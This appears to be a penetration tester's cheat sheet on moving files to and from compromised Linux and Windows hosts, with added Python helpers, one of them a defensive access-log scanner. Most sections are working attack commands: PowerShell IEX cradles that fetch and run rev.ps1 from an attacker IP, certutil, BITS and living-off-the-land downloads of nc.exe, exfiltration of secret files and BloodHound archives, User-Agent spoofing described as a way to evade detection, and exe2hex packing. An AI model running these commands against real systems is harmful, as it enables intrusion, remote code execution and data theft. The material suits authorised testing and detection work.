File Transfers

01. Linux

  • Simple file transfer (My way)

## ------------------| NetCat
### Receiving side
nc -lp 1234 > out.file
### Sending side (-w 3 closes the connection after 3 seconds of inactivity)
nc -w 3 <ReceiverIP> 1234 < out.file
### Sending side without nc (bash builtin /dev/tcp)
cat out.file > /dev/tcp/<ReceiverIP>/1234

## ------------------| Socat
### Sending side
socat TCP4-LISTEN:1234,fork file:secret.txt
### Receiving side
socat TCP4:<SenderIP>:1234 file:secret.txt,create
  • Download Files.

## ------------------| AXEL
axel -a -n 10 -k -o /tmp/secret.txt https://<IP>/secret.txt
## -a    Alternate progress indicator
## -n    Specify maximum number of connections
## -k    Don't verify the SSL certificate (fine for your own self-signed listener, nowhere else)
## -o    Output file

## ------------------| WGET
wget https://<IP>/secret.txt -O /tmp/secret.txt

## ------------------| CURL
curl https://<IP>/secret.txt -o /tmp/secret.txt 

## ------------------| OpenSSL
### Create certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem     
### Stand up server
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/secret.txt
### Download file
openssl s_client -connect <IP>:80 -quiet > secret.txt

## ------------------| Bash (/dev/tcp)
### Open a TCP connection to the target's web server as file descriptor 3
exec 3<>/dev/tcp/10.10.10.32/80
### HTTP GET request (HTTP/1.0 so the server closes the connection once the body is sent; with HTTP/1.1 keep-alive the read below can hang)
echo -e "GET /secret.txt HTTP/1.0\r\nHost: 10.10.10.32\r\n\r\n">&3
### Print the response (status line and headers come first, then the body; strip them before saving the file)
cat <&3
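A Python version of the same raw HTTP GET, added here as an example (it is not part of the original page). `cat <&3` writes the status line and headers together with the body, so redirecting it straight into a file produces a corrupted download; the parser below separates them and honours Content-Length so a short read is reported instead of silently saved. The host, port and path are placeholders.

```python
import socket


def build_request(host: str, path: str) -> bytes:
    """Same request the /dev/tcp trick sends. HTTP/1.0 plus Connection: close
    makes the server close the socket once the body is sent, so a plain
    read-until-EOF loop terminates instead of hanging on a keep-alive."""
    return (f"GET {path} HTTP/1.0\r\n"
            f"Host: {host}\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def split_response(raw: bytes):
    """Split a raw HTTP response into (status, headers, body).

    The header block ends at the first blank line (CRLF CRLF). If the server
    sent Content-Length, the body is cut to exactly that many bytes and a
    short read raises instead of silently producing a partial file."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers in response")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])            # b"HTTP/1.0 200 OK" -> 200
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers:
        expected = int(headers["content-length"])
        if len(body) < expected:
            raise ValueError(f"short read: {len(body)} of {expected} bytes")
        body = body[:expected]
    return status, headers, body


def fetch(host: str, port: int, path: str) -> bytes:
    """Download path from host:port over a raw socket and return the body."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(build_request(host, path))
        chunks = []
        while True:                                # read until the server closes
            chunk = sock.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    status, _, body = split_response(b"".join(chunks))
    if status != 200:
        raise RuntimeError(f"server answered HTTP {status}")
    return body


if __name__ == "__main__":
    # Placeholder target, the equivalent of the exec 3<>/dev/tcp/... line above.
    data = fetch("10.10.10.32", 80, "/secret.txt")
    with open("secret.txt", "wb") as fh:
        fh.write(data)
```

`split_response` is deliberately kept separate from the socket code so the header handling can be checked against a captured response without a live target.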

## ------------------| PHP
### File_get_contents()
php -r '$file = file_get_contents("https://<IP>/secret.txt"); file_put_contents("secret.txt",$file);'       
### Fopen()
php -r 'const BUFFER = 1024; $fremote = fopen("https://<IP>/secret.txt", "rb"); $flocal = fopen("secret.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'      

## ------------------| Python
### Python2
import urllib
urllib.urlretrieve("https://<IP>/secret.txt", "secret.txt")
### Python3
import urllib.request
urllib.request.urlretrieve("https://<IP>/secret.txt", "secret.txt")

## ------------------| Ruby
ruby -e 'require "net/http"; File.write("secret.txt", Net::HTTP.get(URI.parse("https://<IP>/secret.txt")))'

## ------------------| Perl
perl -e 'use LWP::Simple; getstore("https://<IP>/secret.txt", "secret.txt");'

02. Windows

## ------------------| Download & Execute
cp /usr/share/windows-resources/powercat/powercat.ps1 .
powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/powercat.ps1')"

## ------------------| Sender 
powercat -c <IP> -p 1212 -i C:\Users\secret.txt

## ------------------| Receiver
nc -lnvp 1212 > secret.txt
  • Download files.

## ------------------| WebClient.DownloadFile (works on every PowerShell version)
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', 'C:\Users\Public\nc.exe')" 

## ------------------| Invoke-WebRequest (PowerShell 3.0 and later, alias IWR)
powershell -c "Invoke-WebRequest http://<IP>/nc.exe -OutFile C:\Users\Public\nc.exe"

## ------------------| Executed in memory (Invoke-Expression, alias IEX)
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/rev.ps1')"
powershell -c "Invoke-WebRequest http://10.10.14.25/rev.ps1 | iex"

## ------------------| Internet Explorer’s First Run error (-useBasicParsing)
powershell -c "IWR -useBasicParsing http://<IP>/nc.exe -o C:\Users\Public\nc.exe"
### If you have admin access you can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2

## ------------------| CMD ways
certutil -urlcache -split -f "http://<IP>/nc.exe" C:\Users\Public\nc.exe

## ------------------| Using curl (in Windows PowerShell, curl is an alias of Invoke-WebRequest, not curl.exe)
powershell curl http://<IP>/rev.ps1

## ------------------| The Background Intelligent Transfer Service (BITS)
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"
  • Upload Files.

## ------------------| Base64 in an HTTP POST body
### On the Windows host (Windows PowerShell 5.1; on PowerShell 7 use -AsByteStream instead of -Encoding Byte)
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:/<PATH>/BloodHound.zip' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:443 -Method POST -Body $b64
### On the attacker host: catch the POST with netcat, copy the base64 body (everything after the blank line that ends the headers) and decode it (-w only applies when encoding, so it is dropped here)
nc -lvnp 443
echo <base64> | base64 -d > bloodhound.zip

## ------------------| The Background Intelligent Transfer Service (BITS) upload through a proxy
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://<IP>/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql    

## ------------------| HTTP POST
### Create the following up.php on the attacker host (tmp_name is the temporary file PHP wrote; basename() stops path traversal through the client-supplied name)
<?php
$up_dir = '/var/www/html/';
$up_file = $up_dir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $up_file);
?>
### Change ownership so the web server user can write there
sudo chown www-data: /var/www/html
### Upload file through PowerShell (UploadFile sends the form field as "file", which matches $_FILES['file'])
powershell (New-Object Net.WebClient).UploadFile('http://<IP>/up.php', 'nc.exe')
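A Python stand-in for the up.php and nginx receivers, added here as an example (it is not part of the original page). It accepts the three upload shapes used in this section from one listener: raw base64 in a POST body (`Invoke-WebRequest -Method POST -Body $b64`), multipart/form-data (`WebClient.UploadFile`, field name "file") and HTTP PUT (`curl --upload-file`). The client-supplied filename is reduced to a single path component because the Windows side can send any string, including `..\..\`. The port, the upload directory and the form field name are assumptions; the parsing is factored into plain functions so it can be checked offline.

```python
import base64
import binascii
import os
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

UPLOAD_DIR = "/tmp/uploads"      # assumption: where received files are written
FIELD_NAME = "file"              # assumption: same form field as $_FILES['file'] in up.php


def safe_name(name: str, default: str = "upload.bin") -> str:
    """Reduce a client-supplied filename to one safe path component.
    WebClient.UploadFile sends whatever string the caller passed, so the
    receiver must not trust it: strip directories and odd characters."""
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name).lstrip(".")
    return name or default


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Minimal multipart/form-data parser -> {field: (filename, data)}.
    It handles what WebClient.UploadFile and curl -F produce; it is not a
    full RFC 7578 implementation."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        raise ValueError("multipart body without a boundary parameter")
    boundary = b"--" + match.group(1).encode()
    fields = {}
    for part in body.split(boundary)[1:]:
        if part.startswith(b"--"):            # closing delimiter reached
            break
        head, _, data = part.partition(b"\r\n\r\n")
        disp = re.search(rb'name="([^"]*)"(?:;\s*filename="([^"]*)")?', head)
        if not disp:
            continue
        if data.endswith(b"\r\n"):            # CRLF that precedes the next boundary
            data = data[:-2]
        filename = disp.group(2).decode() if disp.group(2) else None
        fields[disp.group(1).decode()] = (filename, data)
    return fields


def decode_base64_body(body: bytes) -> bytes:
    """Decode a body produced by [Convert]::ToBase64String. Whitespace is
    removed first because PowerShell may append a newline to the string."""
    try:
        return base64.b64decode(b"".join(body.split()), validate=True)
    except binascii.Error as exc:
        raise ValueError(f"body is not base64: {exc}") from exc


def extract_upload(method: str, path: str, headers, body: bytes):
    """Return (filename, data) for the three upload shapes, else ValueError."""
    ctype = headers.get("Content-Type", "")
    if method == "PUT":                            # curl --upload-file
        return safe_name(path), body
    if ctype.startswith("multipart/form-data"):    # WebClient.UploadFile
        fields = parse_multipart(body, ctype)
        if FIELD_NAME not in fields:
            raise ValueError(f"no '{FIELD_NAME}' field in multipart body")
        filename, data = fields[FIELD_NAME]
        return safe_name(filename or ""), data
    return safe_name(path), decode_base64_body(body)   # raw base64 POST body


class UploadHandler(BaseHTTPRequestHandler):
    def _receive(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        try:
            filename, data = extract_upload(self.command, self.path, self.headers, body)
        except ValueError as exc:
            self.send_error(400, str(exc))
            return
        os.makedirs(UPLOAD_DIR, exist_ok=True)
        dest = os.path.join(UPLOAD_DIR, filename)
        with open(dest, "wb") as fh:
            fh.write(data)
        self.log_message("saved %d bytes to %s", len(data), dest)
        self.send_response(201)
        self.end_headers()

    do_POST = _receive
    do_PUT = _receive


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8001), UploadHandler).serve_forever()   # assumption: port 8001
```

A base64 POST to `/` lands as `upload.bin` because the request carries no name; a PUT takes its name from the URL path, a multipart upload from the filename in the part header, all passed through `safe_name` first.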
  • wget Scripts

## ------------------| Create wget.js file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

## ------------------| It can be executed as follows.
cscript /nologo wget.js http://<IP>/nc.exe nc.exe

## ------------------| Create wget.vbs file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

## ------------------| It can be executed as follows.
cscript /nologo wget.vbs http://<IP>/nc.exe nc.exe
  • Different User-Agent (to evade simple User-Agent based detections)

## ------------------| WinHttp (Netscape 4.0)
### iex executes script text, so fetch a .ps1 with these cradles, not a binary
$h=new-object -com WinHttp.WinHttpRequest.5.1;
$h.open('GET','http://<IP>/rev.ps1',$false);
$h.send();
iex $h.ResponseText

## ------------------| Msxml2 (Internet Explorer 7.0)
$h=New-Object -ComObject Msxml2.XMLHTTP;
$h.open('GET','http://<IP>/rev.ps1',$false);
$h.send();
iex $h.responseText

## ------------------| Certutil
certutil -urlcache -split -f http://<IP>/nc.exe 
certutil -verifyctl -split -f http://<IP>/nc.exe

## ------------------| BITS
Import-Module bitstransfer;
Start-BitsTransfer 'http://<IP>/rev.ps1' $env:temp\t;
$r=gc $env:temp\t;
rm $env:temp\t;
iex $r

## ------------------| Invoke-WebRequest with User-Agent
### List all available user agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl      
### Download file using a Chrome User Agent
Invoke-WebRequest http://<IP>/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe"
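The defender's side of this section, added here as an example (it is not part of the original page): every download method on this page leaves a characteristic default User-Agent in the web server's access log unless it is overridden the way shown above. The script scans Apache/nginx "combined" log lines for those defaults and, separately, for requests that fetch executable-looking paths, since a spoofed browser User-Agent defeats the first rule but not the second. The log lines are constructed for the example; the User-Agent patterns are the defaults of the tools named in the comments, and the extension list is an assumption.

```python
import re

# Default User-Agents of the download methods listed on this page, as they
# appear in an access log when the operator did not override them.
DEFAULT_AGENTS = [
    ("powershell-iwr",  re.compile(r"WindowsPowerShell/")),          # Invoke-WebRequest, Windows PowerShell 5.1
    ("powershell-core", re.compile(r"(?<!Windows)PowerShell/\d")),    # Invoke-WebRequest, PowerShell 7
    ("certutil",        re.compile(r"Microsoft-CryptoAPI/|CertUtil URL Agent")),  # certutil -urlcache
    ("bits",            re.compile(r"Microsoft BITS/")),              # bitsadmin / Start-BitsTransfer
    ("python-urllib",   re.compile(r"Python-urllib/")),               # urllib.request.urlretrieve
    ("no-user-agent",   re.compile(r"^-$")),                          # System.Net.WebClient sends none
]
PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".zip")  # assumption

# Apache/nginx "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: lines 1-4 carry the defaults left by the methods on
# this page, line 5 uses a spoofed browser UA, line 6 is a real browser.
SAMPLE_LOG = """\
10.10.14.25 - - [12/Mar/2024:10:01:02 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
10.10.14.25 - - [12/Mar/2024:10:01:05 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Microsoft-CryptoAPI/10.0"
10.10.14.25 - - [12/Mar/2024:10:01:09 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Microsoft BITS/7.8"
10.10.14.25 - - [12/Mar/2024:10:01:12 +0000] "GET /rev.ps1 HTTP/1.1" 200 1024 "-" "-"
10.10.14.25 - - [12/Mar/2024:10:01:20 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
192.168.1.7 - - [12/Mar/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
"""


def parse_line(line: str):
    """Combined-format access log line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_agent(ua: str):
    """Name of the download method whose default User-Agent this is, or None."""
    for label, pattern in DEFAULT_AGENTS:
        if pattern.search(ua):
            return label
    return None


def find_suspicious(log_text: str) -> list:
    """Flag requests made with a tool's default UA and/or fetching a payload-like path.
    Overriding the UA (the point of the section above) only defeats the first rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        label = classify_agent(rec["ua"])
        if label:
            reasons.append(label)
        if rec["path"].lower().split("?", 1)[0].endswith(PAYLOAD_EXT):
            reasons.append("payload-extension")
        if reasons:
            hits.append({"ip": rec["ip"], "path": rec["path"], "ua": rec["ua"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]:<12} {", ".join(hit["reasons"]):<32} {hit["ua"]}')
```

The `PSUserAgent::Chrome` line above shows up only under `payload-extension`; matching on the User-Agent alone would miss it, which is why production rules pair the UA check with the requested path, response size or the absence of a Referer.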
## ------------------| Shrink the binary, then convert it to a batch file that rebuilds it on the target (exe2hex)
upx -9 nc.exe
exe2hex -x nc.exe

03. Simple Servers

  • Web servers

## ------------------| Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## ------------------| Ruby
ruby -run -e httpd . -p 8080

## ------------------| PHP
php -S 0.0.0.0:8080

## ------------------| Socat
socat TCP-LISTEN:8080,reuseaddr,fork file:secret.txt

## ------------------| BusyBox
busybox httpd -f -p 10000
  • FTP server

## ------------------| pyftpdlib (pip install pyftpdlib; listens on 2121 by default, -p 21 needs root)
python3 -m pyftpdlib --user=pentester --password=p4ssw0rd -w
  • TFTP server (requires administrative access)

## ------------------| Windows Enable TFTP
DISM /online /Enable-Feature /FeatureName:TFTP
Install-WindowsFeature TFTP-Client

## ------------------| Linux
sudo apt-get install -y atftp
mkdir /tmp/tftp
sudo chown nobody: /tmp/tftp
sudo atftpd --daemon --port 69 /tmp/tftp

## ------------------| Upload file (from the Windows machine; -i selects binary mode)
tftp -i <IP> put nc.exe
  • SMB server

## ------------------| Basic usage
impacket-smbserver <shareName> <sharePath>
impacket-smbserver share $(pwd) -smb2support

## ------------------| Start smb server (with auth)
impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123

## ------------------| Mount without auth
net use Z: \\<MyIP>\share
New-PSDrive -Name h4rithd -PSProvider FileSystem -Root \\<MyIP>\share

## ------------------| Mount with auth (current Windows 10/11 builds refuse guest access to SMB2 shares, so start the server with -username/-password)
net use Z: \\<MyIP>\share /USER:h4rithd Password123
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass)
New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\<MyIP>\share
cd h4rithd:
dir
  • RDP drive redirection (expose a local folder to the target as a redirected drive)

rdesktop -g 1600x800 -r disk:tmp=/tmp/shares <IP> -u h4rithd -p Password123
xfreerdp /u:h4rithd /p:Password123 /cert:ignore /v:<IP> /workarea /drive:share,/localdir /dynamic-resolution +clipboard
### On the target the folder is reachable as \\tsclient\tmp (rdesktop) or \\tsclient\share (xfreerdp)
  • Setup nginx server to upload files.

## ------------------| Create server
mkdir -p /tmp/uploads
sudo chown www-data: /tmp/uploads/

sudo vi /etc/nginx/sites-available/file_upload
server {
    listen 8001 default_server;
    server_name up.h4rithd;
    location / {
        root /tmp/uploads;
        dav_methods PUT;
    }
}

sudo ln -s /etc/nginx/sites-available/file_upload /etc/nginx/sites-enabled/file_upload
sudo systemctl restart nginx

## ------------------| Upload File (anyone who can reach port 8001 can PUT into /tmp/uploads; keep it firewalled to the target)
curl --upload-file UploadFile.txt http://<IP>:8001/

04. Living Off The Land Binaries

## ------------------| Windows: GfxDownloadWrapper.exe (ships with Intel graphics drivers)
GfxDownloadWrapper.exe "http://<IP>/nc.exe" "C:\Temp\nc.exe"
## ------------------| Linux: lwp-download (Perl LWP, present wherever libwww-perl is installed)
lwp-download http://<IP>/nc.exe nc.exe
